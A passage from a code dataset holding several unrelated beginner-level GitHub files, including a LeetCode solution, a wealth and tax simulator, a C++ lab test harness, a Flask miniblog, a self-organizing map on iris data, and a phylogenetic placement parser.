result_raw[0][0]","repo_name":"AWAlexWeber/esi-backend","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"75021241493","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n# \n# Example 1:\n# \n# Input: \"hello\"\n# Output: \"holle\"\n# Example 2:\n# \n# Input: \"leetcode\"\n# Output: \"leotcede\"\n# Note:\n# The vowels does not include the letter \"y\".\n\ndef reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowel=['a','e','i','o','u','A','E','I','O','U']\n v=[]\n sa=[]\n for i in range(0,len(s)):\n sa.append(str(s[i]))\n if s[i] in vowel:\n v.append(str(s[i])) \n v.reverse()\n \n #print v\n vcount=0\n for i in range(0,len(sa)):\n if sa[i] in vowel:\n sa[i]=v[vcount]\n vcount+=1\n \n return ''.join(sa)\n","repo_name":"aniketdn/LeetCode","sub_path":"ReverseVowelsofAString.py","file_name":"ReverseVowelsofAString.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19726320375","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ns_and_p = pd.read_csv('annual_returns.csv')\ns_and_p = s_and_p.loc[s_and_p['Year'].astype(float) > 1960, 'EOY_Mult'].values.astype(float)\ns_and_p = s_and_p - 1\ns_and_p = s_and_p[s_and_p < .3]\n\n\nclass Wealth:\n def __init__(self, contributers=[], current_wealth=10000, investment_return=None, cost_of_living=50000,\n inflation_rate=.0244):\n if len(contributers) == 0:\n print(\"oops, need a contributer\")\n self.investment_return = investment_return\n self.wealth = current_wealth\n self.cost_of_living = cost_of_living\n self.inflation_rate = inflation_rate\n self.contributers = contributers\n self.list_of_records = []\n\n def grow_one_year(self):\n\n self.cost_of_living *= (1 + self.inflation_rate)\n earned_this_year = 0\n for contributer in self.contributers:\n contributer.birthday()\n earned_this_year += contributer.salary\n\n earned_this_year -= fed_tax(earned_this_year)\n earned_this_year -= ca_tax(earned_this_year)\n\n earned_this_year -= self.cost_of_living\n self.wealth += earned_this_year\n if self.investment_return is None:\n this_year_investment_return = np.random.choice(s_and_p)\n else:\n this_year_investment_return = self.investment_return\n\n self.wealth *= (1 + this_year_investment_return)\n\n self.list_of_records.append(\n [contributer.name, contributer.age, contributer.salary, self.wealth, self.cost_of_living,\n this_year_investment_return])\n\n def return_records(self):\n return pd.DataFrame(self.list_of_records, columns=[\"Name\", \"Age\", \"Salary\", \"Wealth\", \"COL\", \"Return%\"])\n\n\nclass Person:\n def __init__(self, name, salary=60000, age=36, retirement_age=65, salary_growth=.04, pension_rate=0):\n self.salary = salary\n self.age = age\n self.retirement_age = retirement_age\n self.salary_growth = salary_growth\n self.highest_salary = salary\n self.name = name\n self.pension_rate = pension_rate\n\n def birthday(self):\n # money_earned = self.salary\n self.salary *= (1 + self.salary_growth)\n if self.highest_salary < self.salary:\n self.highest_salary = self.salary\n\n self.age += 1\n\n if self.age > self.retirement_age:\n self.salary = self.highest_salary * self.pension_rate\n\n\ndef wealth_simulation_aggregation(list_of_results, age_out=70, filename='data.csv'):\n wealth_data = [d.loc[d['Age'] == age_out, 'Wealth'] for d in list_of_results]\n big_array = np.vstack(wealth_data)\n\n age_array = big_array[:, 0]\n age_array.sort()\n\n x = np.arange(0, 1, 1.0 / age_array.shape[0])\n plt.plot(x, age_array)\n plt.plot(age_array, 1 - x)\n\n df_out = pd.DataFrame({'wealth': age_array, 'probability': (1 - x)})\n\n df_out.iloc[np.arange(0, 1000, 10), :].to_csv(filename, index=False)\n\n\ndef ca_tax(income):\n if income < 17618:\n return .01 * income\n elif income < 41766:\n return 176.18 + .0200 * (income - 17618)\n elif income < 65920:\n return 659.14 + .0400 * (income - 41766)\n elif income < 91506:\n return 1625.3 + .0600 * (income - 65920)\n elif income < 115648:\n return 3160.46 + .0800 * (income - 91506)\n elif income < 590746:\n return 5091.82 + .093 * (income - 115648)\n elif income < 708890:\n return 49275 + .103 * (income - 590746)\n else:\n return 61444.76 + .1130 * (income - 708890)\n\n\ndef fed_tax(income):\n taxes = 0\n if income < 19400:\n taxes += income * .1\n return taxes\n else:\n taxes += 19400 * .1\n if income < 78950:\n taxes = taxes + (income - 19400) * .12\n return taxes\n else:\n taxes = taxes + (78950 - 19400) * .12\n if income < 168400:\n taxes = taxes + (income - 78950) * .22\n return taxes\n else:\n taxes = taxes + (168400 - 78950) * .22\n if income < 321450:\n taxes = taxes + (income - 168400) * .24\n return taxes\n else:\n taxes = taxes + (321450 - 168400) * .24\n if income < 408200:\n taxes = taxes + (income - 321450) * .32\n return taxes\n else:\n taxes = taxes + (408200 - 321450) * .32\n if income < 612350:\n taxes = taxes + (income - 408200) * .35\n return taxes\n else:\n taxes = taxes + (408200 - 408200) * .35\n taxes = taxes + (income - 408200) * .37\n return taxes\n","repo_name":"cjstev/wealth_simulation","sub_path":"wealth_lib.py","file_name":"wealth_lib.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8176415402","text":"import os\nimport sys\nimport random\nimport unittest\nimport subprocess\n\nimport numpy as np\n\n\ncheck_output = lambda x: subprocess.check_output(x, universal_newlines=True)\n\n\nclass Lab2Coverage(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n Generate coverage report\n \"\"\"\n\n # Remove bash-playground folder\n subprocess.check_call([\"make\", \"test\"])\n\n\n def test_Matrix_coverage(self):\n \"\"\"\n Check if the test coverage of the Matrix.cpp is 100%\n \"\"\"\n\n coverage = \"not found\"\n for l in check_output([\"python3\", \"coverage.py\", \"-r\", \".\", \"-f\", \"Matrix.cpp\"]).split(\"\\n\"):\n if l.startswith(\"Matrix.cpp\"):\n coverage = l.split()[3]\n\n self.assertEqual(coverage, \"100%\", msg=\"Test coverage is not 100%\")\n\n\nclass Lab2CppTest(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n Compile the program before testing\n \"\"\"\n subprocess.check_call([\"make\", \"all\"])\n\n \n def randmatrix(self, m, n):\n \"\"\"\n Generate a matrix with random elements\n \"\"\"\n A = np.random.randint(0, 100, size=[m, n])\n A[A > 10] = 0\n return A\n\n\n def save(self, M, filename):\n \"\"\"\n Save matrix M to file using the specified format\n \"\"\"\n m, n = M.shape\n\n np.savetxt(filename, M, fmt='%d', header=\"{} {}\".format(m, n), comments='')\n\n\n def load(self, filename):\n \"\"\"\n Load matrix from file.\n \"\"\"\n\n return np.loadtxt(filename, dtype='int32', skiprows=1)\n\n\n def multiply(self, A, B):\n \"\"\"\n Multiply two matrices\n \"\"\"\n\n return np.matmul(A, B)\n\n\n def test_example(self):\n \"\"\"\n Check the program against provided test_example\n \"\"\"\n\n m, p, n = 3, 3, 2\n A = np.array([[-2, 0, 0], [0, 1, 0], [0, 0, -1]], dtype='int8')\n B = np.array([[1, 2], [3, 4], [5, 6]], dtype='int8')\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n\n\n def test_vector_vector(self):\n \"\"\"\n Check vector (m by 1) multiplied with vector (1 by n)\n \"\"\"\n\n m, p, n = 700, 1, 700\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \n def test_vector_vector2(self):\n \"\"\"\n Check vector (1 by p) multiplied with vector (p by 1)\n \"\"\"\n\n m, p, n = 1, 10000, 1\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\").reshape(m, n)\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \n def test_matrix_vector(self):\n \"\"\"\n Check matrix (m by p) multiplied with vector (p by 1)\n \"\"\"\n\n m, p, n = random.randint(400, 500), random.randint(400, 500), 1\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\").reshape(m, n)\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n\n def test_large_matrix_matrix(self):\n \"\"\"\n Check matrix (m by p) multiplied with matrix (p by n)\n \"\"\"\n\n m, p, n = random.randint(400, 500), random.randint(400, 500), random.randint(400, 500)\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \nif __name__ == '__main__':\n\n suite = unittest.TestSuite()\n\n if len(sys.argv) == 2 and sys.argv[1] == \"test-tdd\":\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2Coverage))\n elif len(sys.argv) == 2 and sys.argv[1] == \"test-cpp\":\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2CppTest))\n else:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2Coverage))\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2CppTest))\n\n\n result = unittest.TextTestRunner().run(suite)\n\n # Set the exit code based on the test result\n sys.exit(not result.wasSuccessful())\n","repo_name":"wolvestotem/System-verification-lab","sub_path":"lab2/lab2_test.py","file_name":"lab2_test.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72137973975","text":"# I M P O R T S .\n\nfrom flask import Flask, render_template, redirect, request, url_for\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import ForeignKey\nfrom datetime import *\n\n#App create\napp= Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@localhost/miniblog'\n\n#App reception\ndb = SQLAlchemy(app)\n\n#Migrate instantiation\nmigrate = Migrate(app, db)\n\n#Create table \"USER\"\nclass User(db.Model):\n __tablename__ = 'user'\n \n id = db.Column(db.Integer,\n primary_key = True\n )\n\n username = db.Column(\n db.String(100),\n nullable = False,\n unique = True\n )\n\n password = db.Column(\n db.String(100),\n nullable = False\n )\n\n email = db.Column(\n db.String(100),\n nullable = False,\n unique = True\n )\n def __str__(self):\n return self.name\n\n#Create table \"CATEGORY\"\nclass Category(db.Model):\n __tablename__= 'category'\n\n id = db.Column(\n db.Integer, \n primary_key=True\n )\n \n category_name = db.Column(\n db.String(50), \n nullable=False\n )\n\n def __str__(self):\n return self.name\n\n#Create table \"POST\"\nclass Post(db.Model):\n __tablename__ = 'post'\n\n id = db.Column(\n db.Integer,\n primary_key= True\n )\n\n title = db.Column(\n db.String(100),\n nullable= False\n )\n\n content = db.Column(\n db.Text,\n nullable= False\n )\n\n date = db.Column(\n db.DateTime,\n nullable= False,\n default= datetime.utcnow\n )\n\n author_id= db.Column(\n db.Integer,\n db.ForeignKey('user.id'),\n nullable= False\n )\n\n category_id= db.Column(\n db.Integer,\n db.ForeignKey('category.id'),\n nullable= False\n )\n\n def __str__(self):\n return self.name\n\nclass Comment(db.Model):\n __tablename__ = 'comment'\n\n id = db.Column(\n db.Integer,\n primary_key= True\n )\n\n content = db.Column(\n db.Text,\n nullable= False\n )\n\n date = db.Column(\n db.DateTime,\n nullable= False,\n default= datetime.utcnow\n )\n \n author_id = db.Column(\n db.Integer,\n db.ForeignKey('user.id'),\n nullable= False\n )\n\n post_id = db.Column(\n db.Integer,\n db.ForeignKey('post.id'),\n nullable= False\n )\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.method == 'POST':\n title = request.form['title']\n content = request.form['content']\n author_id = request.form['author']\n category_id = request.form['category-post']\n \n new_post= Post(\n title=title,\n content= content,\n author_id = author_id,\n category_id = category_id\n )\n\n db.session.add(new_post)\n db.session.commit()\n\n return redirect(url_for('index'))\n else:\n return render_template(\n 'index.html'\n ) \ndef format_text(text):\n formatted_text = text.replace('\\n', '
')\n return formatted_text\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n username = request.form['username']\n email = request.form['email']\n password = request.form['password']\n \n new_user = User(username=username,\n email=email,\n password=password\n )\n db.session.add(new_user)\n db.session.commit()\n\n return redirect(url_for('index'))\n else:\n return render_template('register.html')\n\n@app.context_processor\ndef inject_posts():\n posts = db.session.query(Post).all()\n formatted_posts = []\n \n\n for post in posts:\n author = db.session.query(User).get(post.author_id)\n formatted_post = {\n 'id': post.id,\n 'title': post.title,\n 'content': format_text(post.content),\n 'author': author.username,\n 'date': post.date\n }\n formatted_posts.append(formatted_post)\n\n return {'posts': formatted_posts} \n\n@app.context_processor\ndef inject_users():\n users = db.session.query(User).all()\n return dict(\n users = users\n )\n\n@app.context_processor\ndef inject_categories():\n categories = Category.query.all()\n return dict(categories=categories)\n\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit_post(id):\n post = Post.query.get(id)\n\n if request.method == 'POST':\n post.title = request.form['title']\n post.content = request.form['content']\n post.author_id = request.form['author']\n post.category_id = request.form['category-post']\n\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('edit.html', post=post)\n\n@app.route('/delete/')\ndef delete_post(id): \n post = Post.query.get(id)\n Comment.query.filter_by(post_id=id).delete()\n db.session.delete(post)\n db.session.commit()\n return redirect(url_for('index'))\n\n\n@app.route('/comments/')\ndef show_comments(id):\n post = Post.query.get(id)\n comments = Comment.query.filter_by(post_id=id).all()\n\n formatted_comments = []\n for comment in comments:\n author = User.query.get(comment.author_id)\n formatted_comment = {\n 'content': comment.content,\n 'date': comment.date,\n 'author': author.username\n }\n formatted_comments.append(formatted_comment)\n\n return render_template('comments.html', post=post, comments=formatted_comments)\n\n\n@app.route('/add-comment', methods=['POST'])\ndef add_comment():\n content = request.form['content']\n author_id = request.form['author']\n post_id = request.form['post']\n\n new_comment = Comment(\n content=content,\n author_id=author_id,\n post_id=post_id\n )\n\n db.session.add(new_comment)\n db.session.commit()\n\n return redirect(url_for('index'))\n\n","repo_name":"juanjcenturion/centurion-pit_stop-miniblog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33988912960","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 5 11:43:08 2018\n\n@author: gustavo.collaco\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# normalize the values array\ndef normalize(values):\n return (values - values.min()) / (values.max() - values.min())\n\n# find representation (slow)\ndef find_representation(dimension, neuron_weights, n_inputs, values, answers):\n most_similar = np.zeros((dimension, dimension))\n total_inputs = len(values)\n distances = []\n for j in range(dimension):\n for k in range(dimension):\n \n for i in range(total_inputs):\n distance = 0\n for l in range(n_inputs):\n distance += (values[i][l] - neuron_weights[j][k][l]) ** 2\n \n distances.append(np.sqrt(distance))\n \n index_most_similar = np.argmin(distances)\n \n distances = []\n most_similar[j][k] = answers[index_most_similar]\n \n # array containing the most similar values (results from the expected output array)\n # for each 'pixel'\n return most_similar\n \n# plot the values\ndef plot_data_final(dimension, neuron_weights, n_inputs):\n img = np.zeros((dimension, dimension))\n for i in range(dimension):\n for j in range(dimension):\n aux = 0\n for k in range(n_inputs):\n aux += neuron_weights[i][j][k]**2\n img[i][j] = np.sqrt(aux)\n \n plt.figure()\n plt.title(\"Weights updated\")\n plt.imshow(img)\n\n# plot the best matching units\ndef plot_bmu(dimension, best_matching_units, best_matching_units_result, n_inputs):\n img = np.zeros((dimension, dimension))\n fig, ax = plt.subplots()\n \n for i in range(dimension):\n for j in range(dimension):\n value = len(set(best_matching_units_result)) + 1\n value_all = []\n \n if [i, j] in best_matching_units:\n all_found = [k for k, e in enumerate(best_matching_units) if e == [i, j]]\n value = best_matching_units_result[all_found[0]]\n \n if(len(all_found) > 0):\n for z in range(len(all_found)):\n value_all.append(best_matching_units_result[all_found[z]])\n \n value_all = list(set(value_all))\n value = round(sum(value_all) / len(value_all), 2)\n \n img[j][i] = value\n \n img_plt = ax.imshow(img)\n \n # annotations\n for i in range(dimension):\n for j in range(dimension):\n text = ax.text(i, j, img[j, i], ha=\"center\", va=\"center\", color=\"w\")\n\n #plt.figure()\n plt.title(\"Last epochs' best matching units\")\n plt.show()\n\n\n# plot the umatrix\ndef plot_umatrix(dimension, values, neuron_weights, n_inputs, total_inputs, answers):\n img = np.zeros((dimension, dimension))\n \n fig, ax = plt.subplots()\n \n for i in range(dimension):\n for j in range(dimension):\n value = 0\n # checking all possible positions on the grid\n # top left\n if(i == j == 0):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2) \n value = distance / 3\n \n # top right\n elif(i == 0 and j == dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2) \n value = distance / 3\n \n # bottom left\n elif(i == dimension-1 and j == 0):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 3\n \n # bottom right\n elif(i == dimension-1 and j == dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n value = distance / 3\n \n # left middle\n elif(j == 0 and i != 0 and i != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # top middle\n elif(i == 0 and j != 0 and j != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # bottom middle\n elif(i == dimension-1 and j != 0 and j != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # right middle\n elif(j == dimension-1 and i != 0 and i != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n value = distance / 5\n \n # filling the middle\n else:\n distance = 0\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n value = distance / 8\n \n img[i][j] = value\n\n img_plt = ax.imshow(img)\n \n most_similar = find_representation(dimension, neuron_weights, n_inputs, total_inputs, answers)\n \n # annotations\n for i in range(dimension):\n for j in range(dimension):\n text = ax.text(j, i, most_similar[i, j], ha=\"center\", va=\"center\", color=\"w\")\n\n plt.title(\"Umatrix\")\n plt.show()\n\n# dataset preparation function\ndef dataset():\n # read csv file\n data = pd.read_csv(\"dataset_iris.csv\", header=None, sep=\",\")\n # shuffles the data\n data = data.sample(frac=1).reset_index(drop=True)\n # inputs\n values = data.iloc[:, :-1]\n # answers\n answers = data.iloc[:, -1]\n \n # rearranging the values and answers\n values = normalize(values).values\n answers = pd.factorize(answers)[0]\n \n # weights matrix\n dimension_x = dimension_y = int(np.sqrt(round(np.sqrt(2) * np.size(values, 0))))\n n_inputs = len(values[0])\n neuron_weights = np.random.uniform(low=-0.1, high=0.1, size=(dimension_x, dimension_y, n_inputs))\n\n # returning values, answers and weights\n return values, answers, neuron_weights\n\n# competition\ndef kohonen(values, answers, neuron_weights, learning_rate=0.3, n_epochs=100):\n n_inputs = len(values[0])\n total_inputs = len(values)\n dimension = len(neuron_weights[0])\n \n # new \n sigma0 = None\n sigma = None\n initial_learning_rate = learning_rate\n new_learning_rate = learning_rate\n \n # iterate through all epochs\n for epoch in range(n_epochs):\n best_matching_units = []\n best_matching_units_result = []\n \n for i in range(total_inputs):\n \n # calculate all the distances for this input\n distances = []\n for j in range(dimension):\n for k in range(dimension):\n \n distance = 0\n for l in range(n_inputs):\n distance += (values[i][l] - neuron_weights[j][k][l]) ** 2\n \n distances.append(np.sqrt(distance))\n #distances.append(distance)\n \n # minimum distance value (winner)\n index_winner = np.argmin(distances)\n x_winner = index_winner % dimension\n y_winner = int(index_winner / dimension)\n \n # calculate the distances related to the winner \n distances_winner = []\n for y_neuron in range(dimension):\n for x_neuron in range(dimension):\n \n distance = 0\n distance = (x_winner - x_neuron) ** 2 + (y_winner - y_neuron) ** 2\n distances_winner.append(np.sqrt(distance))\n #distances_winner.append(distance)\n\n # adding the winner to the best_matching_units array\n best_matching_units.append([x_winner, y_winner])\n best_matching_units_result.append(answers[i])\n \n if sigma is None:\n sigma = sigma0 = np.sqrt(-(dimension**2) / (2*np.log(0.1)))\n tau = n_epochs / np.log(sigma0/0.1)\n #sigma = sigma0 = np.sqrt(dimension ** 2 + dimension ** 2)\n #tau = (-1) * n_epochs / np.log((5*10**(-5)) / sigma0)#sigma0\n \n # update the weights\n for j in range(dimension):\n for k in range(dimension):\n pos = j * dimension + k\n \n h = np.exp((-1) * distances_winner[pos]**2 / (2 * sigma**2))\n \n for l in range(n_inputs):\n neuron_weights[j][k][l] = neuron_weights[j][k][l] + new_learning_rate * h * (values[i][l] - neuron_weights[j][k][l]) #distances[pos]\n\n sigma = sigma0 * np.exp((-1) * epoch / tau)\n new_learning_rate = initial_learning_rate * np.exp((-1) * epoch / tau)\n \n # prints the actual epoch\n print('Actual epoch: ', epoch)\n print('Learning Rate: ', new_learning_rate)\n print('Sigma: ', sigma)\n print('____________________')\n\n # plotting the final data\n plot_data_final(dimension, neuron_weights, n_inputs)\n plot_bmu(dimension, best_matching_units, best_matching_units_result, n_inputs)\n plot_umatrix(dimension, values, neuron_weights, n_inputs, values, answers)\n\n# main function\nif __name__ == \"__main__\":\n # returning values and neuron_weights from the dataset function\n # the neuron_weights is a 'square', with same length and width\n # its depth is based on the amount of parameters on the input\n values, answers, neuron_weights = dataset()\n \n # calling the network processing\n kohonen(values, answers, neuron_weights)","repo_name":"gucollaco/self-organized-map","sub_path":"som_network.py","file_name":"som_network.py","file_ext":"py","file_size_in_byte":14501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42237870515","text":"#SKC : Great Job! Should work great.\n#SKC : Functions should return their result so that other can use it. Consider that and return \n# rather than the value inside the function i.e. can u print the final results from out of function.\n#Maanya: SKC, Something like this: // I can not print 'totalsum' outside function because I would have to use Global Variables\n\ndef seriessum(summer):\n\ttotalsum = 0\n\tfor i in range(1,summer + 1):\n\t\ttotalsum = totalsum + i \n\t\tprint(totalsum)\n\t\treturn\nsummer = int(input(\"Hello I am The Series Sum Bot. Enter a number which you would like me to sum for you today:\"))\nseriessum()\n","repo_name":"skoolofcode/SKoolOfCode","sub_path":"TrailBlazers/maanya/test/seriessummer.py","file_name":"seriessummer.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22475777524","text":"#! /usr/bin/env python\nimport json\nimport os,sys, re\nimport argparse\nimport pandas as pd\nimport random\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nmy_usage = \"\"\"\nThis script was written to supplement Miguel's script JPlace.to_iToL.rb script. It is meant to take a .jplace file produced by RaxML-EPA.\n\nThe idea is to make a good tree with long sequences, then map illumina OTUs onto the tree. This script will ID the OTUs that map to the nodes on the phylogenetic tree so you can inflate the OTUs back into counts.\n\nThe end goal is to use the iToL (or ggtree) to annotate the reference tree with relative abundance of reads associated with the nodes.\n\nIt takes as input (-i) a .jplace file, a counts file, and output (-o) a file name.\n\nI've only tested this on one dataset. The OTUIDs are called denovo[0-9]+ and the BIOM table has the same row names. I use pandas to split the OTU table based on sequences that are associated with the same node.\n\"\"\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\".jplace file from raxml-epa\", required=True)\nparser.add_argument(\"-o\", \"--output\", help=\"output file name to store results\")\nparser.add_argument(\"-c\", \"--counts\", help=\"species counts table that is tab separated\")\n\nargs = parser.parse_args()\n\n#Delete output file if it already exists\ntry:\n os.remove(args.output)\nexcept OSError:\n pass\n\nwith open(args.input) as jplace:\n json_obj = json.load(jplace)\n\nTree = json_obj['tree']\nTree = re.split(r\"\\(|\\)|,\", Tree)\nnode_names = []\nfor char in Tree:\n if char:\n m = re.match(\"(.*):[0-9]+\\.[0-9]+({[0-9]+})\", char)\n if m > 1:\n node_names.append([m.group(2), m.group(1)])\n elif m == 1:\n node_names.append([m.group(1)])\n else:\n next\n \n \nnode_dict = defaultdict(list)\nfor item in json_obj[\"placements\"]:\n node_key = item['p'][0][0]\n #print node_key\n otu_value = item['n']\n m = re.search('.*(denovo[0-9]+).*', str(otu_value))\n node_dict[node_key].append(m.group(1))\n\n#Subsetting the OTU table and summarizing node results\notu_df = pd.read_table(args.counts, sep=\"\\t\", skiprows=(0), header=(1), index_col=(0))\n\nnew_df = pd.DataFrame(index = node_dict.keys(), columns = list(otu_df))\n#print otu_df[otu_df.index.isin(['denovo0', 'denovo11'])]\n\nfor node, otu in node_dict.iteritems():\n line = 